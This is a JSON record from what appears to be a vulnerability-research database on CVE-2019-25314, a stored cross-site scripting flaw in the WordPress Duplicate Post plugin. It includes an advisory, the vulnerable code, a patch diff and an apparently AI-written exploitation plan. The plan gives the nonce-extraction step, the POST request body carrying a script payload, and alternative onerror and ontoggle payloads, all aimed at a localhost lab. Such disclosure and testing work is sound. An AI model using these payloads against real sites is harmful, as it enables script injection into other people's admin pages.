[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmCYutGCqSlhS1ztHX3BCvZ8rvQ3DNEPV4xqBpTa3og4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2019-25314","duplicate-post-authenticated-administrator-stored-cross-site-scripting","Duplicate Post \u003C= 3.2.3 - Authenticated (Administrator+) Stored Cross-Site Scripting","The Duplicate Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","duplicate-post",null,"\u003C=3.2.3","3.2.4","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-11 00:00:00","2026-02-16 21:41:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe8e2519e-89cc-455f-921c-fe6b10f1dc26?source=api-prod",6,[],"researched",false,3,"# Research Plan: CVE-2019-25314 - Stored XSS in Yoast Duplicate Post\n\n## 1. Vulnerability Summary\nThe **Yoast Duplicate Post** plugin (versions \u003C= 3.2.3) is vulnerable to Stored Cross-Site Scripting (XSS) via its settings page. Specifically, the fields used to define a prefix or suffix for cloned post titles are not properly sanitized before being stored in the database, nor are they escaped when rendered back to the user in the admin interface.\n\nWhile the exploit requires Administrator privileges, it is considered a vulnerability because it allows an admin to bypass `unfiltered_html` restrictions, which are common in WordPress Multisite environments or installations where `DISALLOW_UNFILTERED_HTML` is enabled.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Foptions.php` (Standard WordPress settings handler).\n- **Vulnerable Settings Page:** `\u002Fwp-admin\u002Foptions-general.php?page=duplicatepost`.\n- **Vulnerable Parameters:** `duplicate_post_title_prefix` and `duplicate_post_title_suffix`.\n- **Authentication:** Required (Administrator+).\n- **Precondition:** The WordPress environment must have `unfiltered_html` disabled for the administrator (e.g., Multisite or `define( 'DISALLOW_UNFILTERED_HTML', true );` in `wp-config.php`).\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers its settings in `duplicate-post-options.php` (or the main plugin file) using `register_setting( 'duplicate_post_group', 'duplicate_post_title_prefix' )`. In version 3.2.3, the `sanitize_callback` argument is likely missing or insufficient.\n2.  **Storage:** When an administrator saves the settings via `options.php`, the raw input in `$_POST['duplicate_post_title_prefix']` is saved directly to the `wp_options` table.\n3.  **Output (Sink):** When the administrator visits the settings page (`options-general.php?page=duplicatepost`), the plugin retrieves the option using `get_option( 'duplicate_post_title_prefix' )` and echoes it into the `value` attribute of an `\u003Cinput>` tag or as a text label without using `esc_attr()` or `esc_html()`.\n4.  **Execution:** If the payload contains `\">\u003Cscript>alert(1)\u003C\u002Fscript>`, it breaks out of the HTML attribute and executes the script.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability exploits a standard WordPress settings form. The nonce is generated by `settings_fields( 'duplicate_post_group' )` on the plugin's settings page.\n\n1.  **Navigate** to the Duplicate Post settings page.\n2.  **Extract** the nonce using `browser_eval`.\n\n**Action Plan:**\n- **Page:** `\u002Fwp-admin\u002Foptions-general.php?page=duplicatepost`\n- **Selector:** `input[name=\"_wpnonce\"]`\n- **JS Extraction:** `browser_eval(\"document.querySelector('input[name=\\\"_wpnonce\\\"]').value\")`\n\n## 5. Exploitation Strategy\nThe goal is to inject a script into the `duplicate_post_title_prefix` option.\n\n### Step 1: Login and Nonce Retrieval\nLog in as an Administrator and navigate to the Duplicate Post settings.\n- **Request:** `GET \u002Fwp-admin\u002Foptions-general.php?page=duplicatepost`\n- **Action:** Use `browser_eval` to extract the `_wpnonce` value and the `referer` if necessary.\n\n### Step 2: Inject Payload\nSubmit a POST request to `options.php` to update the settings.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  option_page=duplicate_post_group&\n  action=update&\n  _wpnonce=[EXTRACTED_NONCE]&\n  _wp_http_referer=\u002Fwp-admin\u002Foptions-general.php?page=duplicatepost&\n  duplicate_post_title_prefix=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>&\n  duplicate_post_title_suffix=&\n  submit=Save+Changes\n  ```\n\n### Step 3: Trigger Execution\nNavigate back to the settings page to trigger the stored script.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-general.php?page=duplicatepost`\n- **Verification:** Observe the `alert()` execution or check the HTML source for the unescaped script tags.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `duplicate-post` version 3.2.3 is installed and active.\n2.  **Disable Unfiltered HTML:** Execute via WP-CLI:\n    ```bash\n    wp config set DISALLOW_UNFILTERED_HTML true --raw\n    ```\n3.  **Admin User:** Ensure a standard Administrator user exists.\n\n## 7. Expected Results\n- The POST request to `options.php` should return a `302 Redirect` back to the settings page with `settings-updated=true`.\n- Upon loading the settings page, the browser should execute the injected JavaScript.\n- The HTML source of the page should contain:\n  ```html\n  \u003Cinput ... name=\"duplicate_post_title_prefix\" value=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" \u002F>\n  ```\n\n## 8. Verification Steps\nAfter performing the HTTP exploit, use WP-CLI to verify the injection in the database:\n```bash\nwp option get duplicate_post_title_prefix\n```\n**Success criteria:** The output should exactly match `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n## 9. Alternative Approaches\nIf the settings page escapes the value in the `input` field but fails elsewhere:\n1.  **Check Post List:** Clone a post using the plugin's \"Clone\" link on the `edit.php` (Posts list) page. Check if the newly created draft title (which now includes the prefix) renders the XSS in the post list table.\n2.  **Payload Variation:** Use different tags if `\u003Cscript>` is filtered by a WAF (though unlikely in this isolated test):\n    - `\">\u003Cimg src=x onerror=alert(1)>`\n    - `\">\u003Cdetails open ontoggle=alert(1)>`","The Yoast Duplicate Post plugin for WordPress (v3.2.3 and below) is vulnerable to Stored Cross-Site Scripting via its 'Title prefix' and 'Title suffix' configuration settings. Due to a lack of input sanitization and output escaping, an administrator can inject arbitrary JavaScript that executes whenever the settings page is viewed, effectively bypassing unfiltered_html restrictions in Multisite or hardened environments.","\u002F\u002F Registration of settings without a sanitize_callback in the main plugin file or options handler\nregister_setting( 'duplicate_post_group', 'duplicate_post_title_prefix' );\nregister_setting( 'duplicate_post_group', 'duplicate_post_title_suffix' );\n\n---\n\n\u002F\u002F Rendering of the settings in duplicate-post-options.php (approximate line based on code flow)\n\u003Cinput type=\"text\" id=\"duplicate_post_title_prefix\" name=\"duplicate_post_title_prefix\" value=\"\u003C?php echo get_option('duplicate_post_title_prefix'); ?>\" \u002F>\n\u003Cinput type=\"text\" id=\"duplicate_post_title_suffix\" name=\"duplicate_post_title_suffix\" value=\"\u003C?php echo get_option('duplicate_post_title_suffix'); ?>\" \u002F>","--- duplicate-post-options.php\n+++ duplicate-post-options.php\n@@ -10,2 +10,2 @@\n-register_setting( 'duplicate_post_group', 'duplicate_post_title_prefix' );\n-register_setting( 'duplicate_post_group', 'duplicate_post_title_suffix' );\n+register_setting( 'duplicate_post_group', 'duplicate_post_title_prefix', 'sanitize_text_field' );\n+register_setting( 'duplicate_post_group', 'duplicate_post_title_suffix', 'sanitize_text_field' );\n@@ -50,2 +50,2 @@\n-value=\"\u003C?php echo get_option('duplicate_post_title_prefix'); ?>\"\n+value=\"\u003C?php echo esc_attr(get_option('duplicate_post_title_prefix')); ?>\"\n-value=\"\u003C?php echo get_option('duplicate_post_title_suffix'); ?>\"\n+value=\"\u003C?php echo esc_attr(get_option('duplicate_post_title_suffix')); ?>\"","The exploit targets the WordPress options handling mechanism used by the plugin. An authenticated Administrator first navigates to the Duplicate Post settings page (\u002Fwp-admin\u002Foptions-general.php?page=duplicatepost) to retrieve a valid security nonce. The attacker then sends a POST request to \u002Fwp-admin\u002Foptions.php with the 'option_page' set to 'duplicate_post_group', the captured nonce, and a malicious XSS payload (e.g., \">\u003Cscript>alert(1)\u003C\u002Fscript>) in the 'duplicate_post_title_prefix' or 'duplicate_post_title_suffix' fields. Because the plugin does not sanitize this input, the payload is stored in the options table. The script executes whenever an administrator views the settings page, as the stored value is echoed directly into the HTML input tag's value attribute without escaping.","gemini-3-flash-preview","2026-04-21 01:06:31","2026-04-21 01:08:05",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.2.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fduplicate-post\u002Ftags\u002F3.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fduplicate-post.3.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fduplicate-post\u002Ftags\u002F3.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fduplicate-post.3.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fduplicate-post\u002Ftags"]